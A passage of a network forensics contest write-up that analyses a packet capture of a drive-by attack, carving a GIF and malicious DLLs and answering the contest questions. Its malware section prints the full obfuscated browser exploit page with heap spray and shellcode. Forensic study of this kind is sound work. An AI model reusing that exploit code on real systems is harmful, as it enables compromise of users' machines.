 00a0  46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00   F89a............
 00b0  00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00   .!.......,......
 00c0  01 00 00 02 02 44 01 00 3b                        .....D..;
 
 -------------------------------------------------------------------------------------
 -------------------------------------------------------------------------------------
 
 We see in frame 3 the HTML response from the server.  Looking at the content we see a <script tag.  Looking through that script leads us to the answer to question #2.  Shortly after the "COMMENT" field there is reference to ".data = "vEI";"  This is the data element of the array.
 Also looking at frame 11 we see reference to GIF89a which is the header for a CompuServ Graphics Interchange Format (GIF).  The first three bytes are always (suppose to be) GIF [the signature], followed by the version number (i.e. 89a = July 1989) which identifies the minimum set of capabilities necessary to a decoder to process the contents.
 
 Let's switch tools here for a moment.  We're interested in obtaining the MD5 of the GIF file.  Which means we need to carve the GIF file from the packet capture.  I have used foremost for many carving jobs (and there are many other excellent tools to choose from).  So let's extract the file with foremost.  The command would be "foremost -t gif evidence06.pcap" which results in one file being extacted.  Running MD5sum on the resulting file produces the answer to question 3b == df3e567d6f16d040326c7a0ea29a4f41
 
 Now let's take a look at the Port A == 4444 and Port B == 1036
 The WireShark Method: Enter filter "tcp.srcport==4444 && tcp.dstport==1036" and click Apply.  Click on Frame 17.  The Packet Bytes window shows some interesting information.  The string "MZ" and "This program cannot be run in DOS mode" near the beginning of the content would lead one to believe this is an executable file being transferred from Evil Ann to Vick's host.
 The Tshark Method: "tshark -r evidence06.pcap -R tcp.dstport==4444 && tcp.srcport==1036 -x  Ccontent.1036.txt"  The beginning of the output file again shows the same information "MZ and This program cannot be run in DOS mode".  We will also find that Frame 17 contains reference the the executable. Which happens to be the answer to question #6a.  
 
 Firing up foremost to carve out the executable we run into a problem however.  According to foremost there are two (2) executables.  How do we know which executable goes with this stream?  We need to break the streams into individual files using TCPFLOW.  By each stream having its own file we can use Foremost to extract the correct file and continue building our timeline (as accurate as possible).
 
 The command we use is tcpflow -r evidence06.pcap  
 
 drwxrwxrwx 5 sansforensics sansforensics       4096 2010-06-14 16:24 .
 drwxrwxr-x 5 sansforensics root                4096 2010-06-14 15:17 ..
 -rw-rw-rw- 1 sansforensics sansforensics    1239098 2010-06-14 16:24 010.010.010.010.04444-010.010.010.070.01036
 -rw-rw-rw- 1 sansforensics sansforensics 1437183436 2010-06-14 16:24 010.010.010.010.04445-010.010.010.070.01044
 -rw-rw-rw- 1 sansforensics sansforensics       6019 2010-06-14 16:24 010.010.010.010.08080-010.010.010.070.01035
 -rw-rw-rw- 1 sansforensics sansforensics        658 2010-06-14 16:24 010.010.010.070.01035-010.010.010.010.08080
 -rw-rw-rw- 1 sansforensics sansforensics      96138 2010-06-14 16:24 010.010.010.070.01036-010.010.010.010.04444
 -rw-rw-rw- 1 sansforensics sansforensics    1144419 2010-06-14 16:24 010.010.010.070.01044-010.010.010.010.04445
 
 Now looking at this directory structure we can see that the file is the one we are interested in (since we have already been talking about it above.)  So let's take foremost and run it against that file to look for any executables.  The command this time is going to be "foremost -t exe 010.010.010.010.04444-010.010.010.070.01036".  When we look at the audit.txt file (created in the output directory) we see the following information.
 
 =======================================================================================
 Audit File
 
 Foremost started at Mon Jun 14 22:54:19 2010
 Invocation: foremost -t exe 010.010.010.010.04444-010.010.010.070.01036 
 Output directory: /images/contest6/output
 Configuration file: /usr/local/etc/foremost.conf
 ------------------------------------------------------------------
 File: 010.010.010.010.04444-010.010.010.070.01036
 Start: Mon Jun 14 22:54:19 2010
 Length: 1 MB (1239098 bytes)
  
 Num      Name (bs=512)         Size      File Offset     Comment 
 
 0:      00000000.dll         730 KB               4      04/03/2010 04:07:31
 Finish: Mon Jun 14 22:54:19 2010
 
 1 FILES EXTRACTED
         
 exe:= 1
 ------------------------------------------------------------------
 
 Foremost finished at Mon Jun 14 22:54:19 2010
 =======================================================================================
 
 Now we see that foremost extracted one (1) file that it believes is an executable.  Let's run file (Linux command) againist it to see what type of file Linux believes it is.  The command is "file 00000000.dll" which produces the output below.
 
 sansforensics@SIFT-Workstation:~/cases/contest6/output/dll$ file 00000000.dll 
 00000000.dll: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
 
 Running md5sum againist the output produces the following, which is the answer to question #6b
 sansforensics@SIFT-Workstation:~/cases/contest6/output/dll$ md5sum 00000000.dll 
 b062cb8344cd3e296d8868fbef289c7c  00000000.dll
 
 Let's get the opinion from VirusTotal and ThreatExpert.  For more online-automated malware analysis services see http://zeltser.com/reverse-malware/automated-malware-analysis.html
 
 VirusTotal Results.  We can see that 26 of the 41 Antivirus vendors detected the execuatble as malicious.  There is also a link in the VirusTotal results that point to the ThreatExpert information on this piece of malware.
 File 4444-exe received on 2010.06.14 13:30:23 (UTC)
 Current status: finished
 Result: 26/41 (63.41%)
 
 
 Antivirus 		Version 		Last Update 	Result
 a-squared 		5.0.0.26 		2010.06.14 	Virus.Win32.Hijack!IK
 AhnLab-V3 		2010.06.14.02 	2010.06.14 	Win-Trojan/Xema.variant
 AntiVir 		8.2.2.6 		2010.06.14 	TR/Swrort.A.964
 Antiy-AVL 		2.0.3.7 		2010.06.11 	-
 Authentium 		5.2.0.5 		2010.06.13 	-
 Avast 			4.8.1351.0 		2010.06.14 	Win32:Hijack-GL
 Avast5 			5.0.332.0 		2010.06.14 	Win32:Hijack-GL
 AVG 			9.0.0.787 		2010.06.14 	Generic2_c.ADPV
 BitDefender 	7.2 			2010.06.14 	Trojan.Generic.3692330
 CAT-QuickHeal 	10.00 			2010.06.14 	Trojan.Swrort.a
 ClamAV 			0.96.0.3-git 	2010.06.14 	-
 Comodo 			5098 			2010.06.14 	UnclassifiedMalware
 DrWeb 			5.0.2.03300 	2010.06.14 	-
 eSafe 			7.0.17.0 		2010.06.13 	-
 eTrust-Vet 		36.1.7632 		2010.06.14 	-
 F-Prot 			4.6.0.103 		2010.06.13 	-
 F-Secure 		9.0.15370.0 	2010.06.14 	Trojan.Generic.3692330
 Fortinet 		4.1.133.0 		2010.06.14 	-
 GData 			21 				2010.06.14 	Trojan.Generic.3692330
 Ikarus 			T3.1.1.84.0 	2010.06.14 	Virus.Win32.Hijack
 Jiangmin 		13.0.900 		2010.06.13 	Trojan/Generic.cfa
 Kaspersky 		7.0.0.125 		2010.06.14 	-
 McAfee 			5.400.0.1158 	2010.06.14 	Generic.dx!spo
 McAfee-GW-Edition 	2010.1 		2010.06.14 	Generic.dx!spo
 Microsoft 		1.5802 			2010.06.14 	Trojan:Win32/Swrort.A
 NOD32 			5195 			2010.06.14 	-
 Norman 			6.04.12 		2010.06.13 	W32/Suspicious_Gen2.ATQPC
 nProtect 		2010-06-14.02 	2010.06.14 	Trojan.Generic.3692330
 Panda 			10.0.2.7 		2010.06.13 	Trj/Downloader.MDW
 PCTools 		7.0.3.5 		2010.06.14 	Trojan.Gen
 Prevx 			3.0 			2010.06.14 	-
 Rising 			22.51.06.01 	2010.06.13 	-
 Sophos 			4.54.0 			2010.06.14 	Mal/Generic-L
 Sunbelt 		6446 			2010.06.14 	Trojan.Win32.Generic!BT
 Symantec 		20101.1.0.89 	2010.06.14 	Trojan.Gen
 TheHacker 		6.5.2.0.298 	2010.06.12 	-
 TrendMicro	 	9.120.0.1004 	2010.06.14 	TROJ_GEN.UAE151U
 TrendMicro-HouseCall 	9.120.0.1004 	2010.06.14 	TROJ_GEN.UAE151U
 VBA32 			3.12.12.5 		2010.06.14 	-
 ViRobot 		2010.6.14.3884 	2010.06.14 	-
 VirusBuster 	5.0.27.0 		2010.06.14 	Trojan.Swrort.AEVAdditional information
 
 
 File size: 748032 bytes
 MD5   : b062cb8344cd3e296d8868fbef289c7c
 SHA1  : b22683394afda7c3fa1d559169ce479c1fdad4f9
 SHA256: 14f489f20d7858d2e88fdfffb594a9e5f77f1333c7c479f6d3f1b48096d382fe
 PEInfo: PE Structure information
 
 ( base data )
 entrypointaddress.: 0x627C5
 timedatestamp.....: 0x4BB6BF03 (Sat Apr 3 06:07:31 2010)
 machinetype.......: 0x14C (Intel I386)
 
 ( 4 sections )
 n_waitable, send_core_console_write
 TrID  : File type identification
 DOS Executable Generic (100.0%)
 ThreatExpert: http://www.threatexpert.com/report.aspx?md5=b062cb8344cd3e296d8868fbef289c7c
 
 Now we have only one stream to follow to see what it brings us.  We will be repeating many of the same steps (that we just finished) to find out what is in that final stream.
 
 
 Now let's take a look at the Port A == 4445 and Port B == 1044
 The WireShark Method: Enter filter "tcp.srcport==4445 && tcp.dstport==1044" and click Apply.  In the Packet List window we can see a number of [RST, ACK] from Evil Ann's host which is like telling Vick's host to that the port is not open and to reset the connection.  So we need to look down the Packet List to when we see Evil Ann's host acknowledge the connection with a [Syn, Ack].  So we can expand our filter to find just the right connection acceptance from Evil Ann's computer.  Our new filter will be "tcp.srcport==4445 && tcp.dstport.==1044 && tcp.flags.ack == 1 && tcp.flags.syn == 1".  Also, if we right click on that packet detail and "follow tcp stream" we  will see "MZ" and "This program cannot be run in DOS mode" near the beginning of the content would lead one to believe this is another executable file being transferred from Evil Ann to Vick's host.
 The Tshark Method: tshark -r evidence06.pcap -R "tcp.flags.ack==1 and tcp.flags.syn==1 and tcp.srcport==4445" -T fields -e frame.number -e frame.time -e frame.time_relative will produce the exact output we are looking for, when the connection on port 4445 was successfully established.  Which is the real answer to #8 123.7
 
 1657    Apr 28, 2010 18:42:02.985580000  123.674296000
 
 "tshark -r evidence06.pcap -R "tcp.dstport==4445 && tcp.srcport==1044" -x  Content.1044.txt"  The beginning of the output file again shows the same information "MZ and This program cannot be run in DOS mode".  We again find that this leads us to the answer to question 9. We simply continue by carving out the file from the stream we previously broke apart using tcpflow.
 
 The command for foremost this time is almost identical to the last command, except we choose the other stream.  "foremost -t exe 010.010.010.010.04445-010.010.010.070.01044"
 
 The audit.txt file confirms that one executable file was extracted from the stream.
 
 sansforensics@SIFT-Workstation:~/cases/contest6/output_Tue_Jun_15_00_27_03_2010$ tail audit.txt 
 
 0:	02805371.dll 	     730 KB 	 1436350349 	 04/03/2010 04:07:31
 Finish: Tue Jun 15 00:27:12 2010
 
 1 FILES EXTRACTED
 	
 exe:= 1
 ------------------------------------------------------------------
 
 Foremost finished at Tue Jun 15 00:27:12 2010
 
 File reports that the extracted file is a PE32 executable file again.
 
 sansforensics@SIFT-Workstation:~/cases/contest6/output_Tue_Jun_15_00_27_03_2010/dll$ file 02805371.dll 
 02805371.dll: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
 
 And finally, the md5 of the file is: b062cb8344cd3e296d8868fbef289c7c (answer to #9).
 
 md5sum 02805371.dll 
 b062cb8344cd3e296d8868fbef289c7c  02805371.dll
 
 There is one question (two parts) remaining from the contest.
 
 #7a
 The WireShark Method: In the filter we need to enter "tcp.port==4445" and manually examine the packet details for the sequence numbers.  Here is where the tshark method really begins to shine.  We can extract only the fields we desire without having to manually dig through the packet details.
 The TShark Method: Using the command "tshark -r evidence06.pcap -R tcp.seq -R tcp.nxtseq -R tcp.dstport==4445 -o tcp.relative_sequence_numbers:FALSE -T fields -e frame.number -e ip.src -e tcp.dstport -e tcp.seq" will provide us with sufficient information to answer this part of the question.  
 
 1153	10.10.10.70	4445	553522758	
1155	10.10.10.70	4445	553522758	
1157	10.10.10.70	4445	553522758	
1159	10.10.10.70	4445	553800369	
1161	10.10.10.70	4445	553800369	
1163	10.10.10.70	4445	553800369	
1165	10.10.10.70	4445	554100968	
1167	10.10.10.70	4445	554100968	
1174	10.10.10.70	4445	554100968	
1176	10.10.10.70	4445	554399680	
1178	10.10.10.70	4445	554399680	
 
 We can see in this snippet of the results that for every third frame that our host sends a request to Evil Ann on port 4445 the ISN changes.
 
 #7b 
 The WireShark Method: In the filter field we need to put "ip.id && tcp.dstport==4445" and click Apply.  Select one of the frames and expand the Internet Protocol section of the Packet Detail window.  Look at the Identification line and record the number, select the next frame and do the following.  
 The Tshark Method: The command is "tshark -r evidence06.pcap -R ip.id -R tcp.dstport==4445 -T fields -e frame.number -e ip.id -e tcp.dstport" which will provide the follwoing output.  We can see that the ip.id increments by one for each new frame.  Again tshark really helps the analyst here narrow down the pcap to what the analyst wants to see.
 
 Frame	IP.ID	Port
 1153	0x0167	4445
 1155	0x0168	4445
 1157	0x0169	4445
 1159	0x016a	4445
 1161	0x016b	4445
 1163	0x016c	4445
 1165	0x016d	4445
 1167	0x016e	4445
 1174	0x0171	4445
 1176	0x0172	4445
 1178	0x0173	4445
 1180	0x0174	4445
 1182	0x0175	4445
 1184	0x0176	4445
 1186	0x0177	4445
 1198	0x017c	4445
 1200	0x017d	4445
 1207	0x0180	4445
 1209	0x0181	4445
 ...
 ...
 ################################
 ### Final Timeline of Events ###
 ################################
 
 
 	01	^	^	^	^	^	^	^	^	^	^	^	^	^	^	^	^
 ----^---^---^---^---^---^---^---^---^---^---^---^---^---^---^---^---^-
 
 01.		Wed Apr 28 18:39:59 2010    
 02.		18:39:59.311284000 -- initial URL request
 03.		18:39:59.773396000 -- URI request for gif
 04. 	18:40:00.577135000 -- initial download of malware (port 4444)
 04.		18:40:35.258314000 -- Initial heartbeat
 05.		18:40:47.043801000 -- second heartbeat
 06.		18:40:58.774241000 -- third heartbeat
 07.		18:41:10.569276000 -- fourth heartbeat
 08.		18:41:22.305270000 -- fifth heartbeat
 09.		18:41:34.189450000 -- sixth heartbeat
 10.		18:41:46.149972000 -- seventh heartbeat
 11.		18:41:58.057545000 -- Finally heartbeat 
 12.		18:42:02.985580000 -- Evil Ann host response to heartbeat and 2nd download of malware
 12.		Wed Apr 28 18:43:17 -- end of packet capture
 
 #############################
 ### Malware Analysis      ###
 #############################
 
 Let's take a quick look at the attack.
 
 Vick's computer connected to Evil Ann's computer via an HTTP channel.  In return, Evil Ann send Vick's computer the following HTML (this was extracted from the streams via foremost).
 
 <html
 <head
 <script
 var UWnHADOfYHiHDDXj = "COMMENT";
 var qSNgVkOrdIjaiFpPTfDjbPHQppHSGtzpmOOyqEbLEFxNqAxicRyZKKWiRWmUaDHFOuzHPHqLrRFSzQuPusTnQyqpQwVpARdlR = new Array();
 for (i = 0; i < 1300; i++)
 {
   qSNgVkOrdIjaiFpPTfDjbPHQppHSGtzpmOOyqEbLEFxNqAxicRyZKKWiRWmUaDHFOuzHPHqLrRFSzQuPusTnQyqpQwVpARdlR[i] = document.createElement(UWnHADOfYHiHDDXj);
   qSNgVkOrdIjaiFpPTfDjbPHQppHSGtzpmOOyqEbLEFxNqAxicRyZKKWiRWmUaDHFOuzHPHqLrRFSzQuPusTnQyqpQwVpARdlR[i].data = "vEI";
 }
 var dccahTiTDPLKAIGwlKLcqCTAoePblbBvEYSuWFWodqQrztYYizoWxwqlMJzsyPhKfhPwpLGFWIflTpaOhwy = null;
 var VTWgXjXYoSTHY = new Array();
 var lwFZUGyxMIWTGMBfMqyKxGTRyRuDasLmlzjI = unescape;
 function XyFfBwnvNTHaNNqCqPKVxmwOjqwptvyJsLDUgweSdLDgm()
 {
   var LLVcUmerhpt = lwFZUGyxMIWTGMBfMqyKxGTRyRuDasLmlzjI( '%u0d9b%u2cb8%u6b70%u1dd4%u1cb3%u08b7%u39f5%u3ffd%u99b4%u928d%u0442%u024e%u3ce2%ub193%u2dba%u3776%u430c%ua8b6%u9735%u247e%u77b2%u3446%u91be%u4148%uf822%u99a9%u787d%ub966%u43ba%u4b7c%u488d%u7037%u0472%u9815%ueb31%u2b25%u24d5%ub3b0%u3c1d%u6997%ub4f5%u4e93%u18a9%u41e3%u2c7a%u0c9b%u402d%u13bb%u7bfc%u9114%u3b46%ufdd2%u7f67%ud619%u3071%u3fe1%u7690%u3d4f%u3574%u2fb6%u0573%ue280%u4775%ua8b2%ue086%u2979%ubef9%ub5b8%uf811%u929f%u960d%u1c27%ud420%ubfb1%u4234%u4a7e%ub749%u2d77%u7776%u9f2f%u2797%u7124%u7a72%u3770%ud410%u0190%u7ee3%u4274%ueb85%u4873%ua81c%ubf0c%ue009%ufe38%ue2c1%u8d46%u4793%u9914%u7db8%uf81a%ubb25%u3579%ue188%u402c%u3f7b%u2866%u05d5%u75b4%ud00b%u34d6%u1da9%uf533%ufd81%u0d41%u929b%u7fbe%u3a43%ub9f9%ub04e%uba49%u15b7%ub1b5%u964b%ufc03%ub24a%ub391%u4f98%u04b6%u6778%u3c7c%u707d%u933d%u1c7c%u3cb5%u4798%u783d%ue232%u7974%ub805%u4924%u9299%u2596%u417f%uf989%u9bb6%u2d4e%ub24b%u2746%u1248%u3feb%ud687%u6697%ufc84%ud42a%u0c0
4%
  ub1b3%u674f%u3171%u7ae0%u7335%ud52b%u1d91%u2f7e%u4072%u77a9%ua82c%ub042%u3bb4%u0de1%u3776%u8d34%u7bb7%ue321%u1975%uf8d3%uf586%uba90%u4abb%u1443%u15b9%u13bf%ubefd%u819f%u79e0%u2f70%u6677%u0105%u72e1%u9042%u8db2%u154b%u7673%u7e3d%ue230%u3475%u8592%ubfd5%u4604%u1d78%ud428%ube2d%u3548%u9b99%u9793%ubbb4%ub6b5%u9843%u3ca9%u4a37%uf584%u4e74%u3f1c%u6949%u03fd%u0cf9%u1471%u2540%u41b0%u20b8%u88d6%u7ae3%u9f4f%u7b47%ud12a%uebc0%u0d2c%u9624%ub9ba%u7cb1%u677f%ufc1a%u9127%ua8b7%u727d%ueb29%uf86b%u97b3%u0470%uf71b%u12e2%u15e0%uba24%u787e%u4e77%u7b99%u9348%u80b1%u7ae1%u3466%u7db0%u2d7c%u8d4f%u1049%u41e3%u14a9%u712c%u7476%u3567%u960d%u9fbe%ub3bb%u377f%uf50a%u3ab7%u33fc%u25d4%ub992%u799b%u4073%ub61d%ub20c%u3f2f%ub427%u9805%u094b%ubff9%u7475%u7f1c%u4273%u4a79%ua8b5%ue389%uf811%u4676%u3c71%u0872%u78d5%ufd23%u91b8%u8c90%u18e2%u3de1%u0b7e%u75d6%u7a43%u7047%uf539%u4b7c%u7d99%ubf40%u1c7b%u388d%u42e0%ub993%ua947%uc183%u2feb%ud602%uba25%u32bb%u35f8%ubeb3%ub49f%ud014%u48d4%ua896%u4f2d%u4605%ud5f6%u3d
3c
  %u9715%u493f%u0db6%u924e%ufcb0%u2c4a%u9b37%u9834%u27b2%u7790%u240c%ub504%u1d66%u91b8%ub167%ufdd2%u4143%u22b7%udbf9%ud9df%u2474%u29f4%u58c9%u4bb1%u3fbd%u8e94%u836e%ufce8%u6831%u0313%u8757%u9b6c%u6326%u9624%u93d7%ube39%u6cae%u3fc2%ue5d0%u0e27%u92c2%u232c%ud1d2%uc861%ub499%u5b91%u10ef%uec95%u4745%ued98%u4768%u2d76%u3beb%u6285%u02cb%u7746%u420a%u78bb%u1b5e%u2bb7%u284e%uf785%ufe6f%u4881%u7b17%u3c55%u82ad%ued86%ucdba%u853e%uede4%u4a3f%ud2f7%ue776%ua1c3%u2188%u491a%u0dbb%u74f0%u8073%ub009%u7bb4%uca7c%u06c6%u0986%udcb4%u8c03%u961e%u74b3%u7b9e%ufe25%u30ac%u5822%uc7b1%ud2e7%u4ccd%u3506%u1644%u912c%ucc0c%u804d%ua3e8%ud272%u1b55%u98d6%u4874%uc360%ubd10%ufc5e%ua9e0%u8fe9%u76d2%u1841%ufe5f%udf4f%ud5a0%u4f37%ud65f%u5947%u82a4%uf117%uab0d%u01fc%u7eb1%u5252%ud11d%u0212%u81dd%u48fa%ufed2%u731a%u9738%u89b0%u92ab%u984e%ucb21%u9c4c%u5724%u7ad9%u772c%ud58f%ueed9%uae8a%uee78%ucb01%u64bb%u2ba5%u8d75%u3fc0%u7de2%u629f%u82a5%u080a%u174a%u9bb0%u8f1d%ufaba%u106a%u2945%u99e1%u92d3%ue59e%u1333%ub05f%u1
35
  9%u6437%u4039%u6b22%uf494%ufeff%uad16%ua9ac%u537e%u9e8a%uac21%u1ef9%u7b1e%ua4c4%u0956%u6524');
   var wFbKpUHikXyRVJZQIYEsmsTVjNNgHkBIdNwmxtUMqQzsbpqNyO = lwFZUGyxMIWTGMBfMqyKxGTRyRuDasLmlzjI( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
   do { wFbKpUHikXyRVJZQIYEsmsTVjNNgHkBIdNwmxtUMqQzsbpqNyO += wFbKpUHikXyRVJZQIYEsmsTVjNNgHkBIdNwmxtUMqQzsbpqNyO } while( wFbKpUHikXyRVJZQIYEsmsTVjNNgHkBIdNwmxtUMqQzsbpqNyO.length < 0xd0000 );
   for (PEf = 0; PEf < 150; PEf++) VTWgXjXYoSTHY[PEf] = wFbKpUHikXyRVJZQIYEsmsTVjNNgHkBIdNwmxtUMqQzsbpqNyO + LLVcUmerhpt;
 }
 function CkoNbET(OZaAHBUXXTUpHcLuyXFerYFtnsKQFzFRKsWwuisbjjaqDCeJARnzqPxUhjKhBZZJkohA)
 {
   XyFfBwnvNTHaNNqCqPKVxmwOjqwptvyJsLDUgweSdLDgm();
   dccahTiTDPLKAIGwlKLcqCTAoePblbBvEYSuWFWodqQrztYYizoWxwqlMJzsyPhKfhPwpLGFWIflTpaOhwy = document.createEventObject(OZaAHBUXXTUpHcLuyXFerYFtnsKQFzFRKsWwuisbjjaqDCeJARnzqPxUhjKhBZZJkohA);
   document.getElementById("jWfnzfLhenIemfKFynaujTIQUhzZVHTcZuJaeFtmqBXYrwn").innerHTML = "";
   window.setInterval(vldTpeimKzBERsNeByodkqCLvbmselSexjNZwNtHDaWDkZKQHlZIKIZtQqNeWtWcZzpDoMXcAjkyyhRONrLy, 50);
 }
 function vldTpeimKzBERsNeByodkqCLvbmselSexjNZwNtHDaWDkZKQHlZIKIZtQqNeWtWcZzpDoMXcAjkyyhRONrLy()
 {
   p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
   for (i = 0; i < qSNgVkOrdIjaiFpPTfDjbPHQppHSGtzpmOOyqEbLEFxNqAxicRyZKKWiRWmUaDHFOuzHPHqLrRFSzQuPusTnQyqpQwVpARdlR.length; i++)
   {
     qSNgVkOrdIjaiFpPTfDjbPHQppHSGtzpmOOyqEbLEFxNqAxicRyZKKWiRWmUaDHFOuzHPHqLrRFSzQuPusTnQyqpQwVpARdlR[i].data = p;
   }
   var t = dccahTiTDPLKAIGwlKLcqCTAoePblbBvEYSuWFWodqQrztYYizoWxwqlMJzsyPhKfhPwpLGFWIflTpaOhwy.srcElement;
 }
 </script
 </head
 <body
 <span id="jWfnzfLhenIemfKFynaujTIQUhzZVHTcZuJaeFtmqBXYrwn"<iframe src="/index.phpmfKSxSANkeTeNrah.gif" onload="CkoNbET(event)" /</span
 </body
 </html
 
 Looking at the contents we can see some obfuscated JavaScript.  Much of it is beyond the discussion for this analysis/contest.  But if we're interested in getting an idea on what it does, head over to JSunpack (http://jsunpack.jeek.org/dec/go?) and upload the contents of the HTML, javascript or a pdf to have it analyzed.  JSunpack detected this HTML/Script was exploiting CVE-2010-2049 MSIEUseAfterFree.  This also confirms the finding of ClamAv earlier in the analysis.
 
 We also know that an executable file was dropped on Vick's computer (twice) from the packet capture.  We've run those files through Virustotal and ThreatExpert to see that each file is considered malicious and that many of the AV vendors have signatures to detect the malware.
 
 ###################
 ### Final Notes ###
 ###################
 
 Finally, I want to say thanks to the following people.
 -- Rob Lee for all of the wonderful work he has done to advance the Forensic community and training. 
 -- Sherri, Eric, and Jonathan for these wonderful puzzles... this is only the second one submitted but I have learn a ton from both.
 -- Authors/coders behind the tools I used during this little puzzle (as well as at my day job).
 -- Other past winners/submissions who I have also learned from during my work on this puzzle.
 
 #############################
 ### Questions and Answers ###
 #############################
 
 1. What was the full URI of Vick Timmes' original web request? (Please include the port in your URI.) 
 	Answer: http://10.10.10.10:8080/index.php
 
 
 2. In response, the malicious web server sent back obfuscated JavaScript. Near the beginning of this code, the attacker created an array with 1300 elements labeled "COMMENT", then filled their data element with a string. What was the value of this string?
 (Note: the scan consisted of many thousands of packets.) Pick one:
 	Answer: a.	“vEI”	
 
 
 3. Vick's computer made a second HTTP request for an object. 
 	a.	What was the filename of the object that was requested? 
 			Answer: index.phpmfKSxSANkeTeNrah.gif
 	b.	What is the MD5sum of the object that was returned? 
 			Answer: df3e567d6f16d040326c7a0ea29a4f41 
 
 		
 4. When was the TCP session on port 4444 opened? (Provide the number of seconds since the beginning of the packet capture, rounded to tenths of a second. ie, 49.5 seconds)
 			Answer: Packet 13 -- 1.3 (1.26 rounded up) seconds
 
 
 5. When was the TCP session on port 4444 closed? (Provide the number of seconds since the beginning of the packet capture, rounded to tenths of a second. ie, 49.5 seconds) 
 			Answer: Packet 1565 -- 87.6 (87.58 rounded up) seconds
 
 
 6. In packet 17, the malicious server sent a file to the client. 
 	a.	What type of file was it? Choose one: 
 		•	// Windows executable  //
 		•	GIF image
 		•	PHP script 
 		•	Zip file 
 		•	Encrypted data 
 	b.	What was the MD5sum of the file? 
 			b062cb8344cd3e296d8868fbef289c7c.
 
 7. Vick's computer repeatedly tried to connect back to the malicious server on port 4445, even after the original connection on port 4444 was closed. With respect to these repeated failed connection attempts: 
 	a.	How often does the TCP initial sequence number (ISN) change? (Choose one.) 
 		•	Every packet
 		•	// Every third packet //
 		•	Every 10-15 seconds 
 		•	Every 30-35 seconds 
 		•	Every 60 seconds 
 		
 	b.	How often does the IP ID change? (Choose one.) 
 		•	// Every packet //
 		•	Every third packet 
 		•	Every 10-15 seconds 
 		•	Every 30-3econds 
 		•	Every 60 seconds 
 		
 		
 	c.	How often does the source port change? (Choose one.) 
 		•	Every packet 
 		•	Every third packet 
 		•	// Every 10-15 seconds //
 		•	Every 30-35 seconds 
 		•	Every 60 seconds 
 		
 		
 8.	Eventually, the malicious server responded and opened a new connection. When was the TCP connection on port 4445 first successfully completed? (Provide the number of seconds since the beginning of the packet capture, rounded to tenths of a second. ie, 49.5 seconds) 
 		Answer: 123.7
 	
 	
 9.	Subsequently, the malicious server sent an executable file to the client on port 4445. What was the MD5 sum of this executable file? 
 		Answer: b062cb8344cd3e296d8868fbef289c7c
 		
 10.	When was the TCP connection on port 4445 closed? (Provide the number of seconds since the beginning of the packet capture, rounded to tenths of a second. ie, 49.5 seconds) 
 	a.	198.4 seconds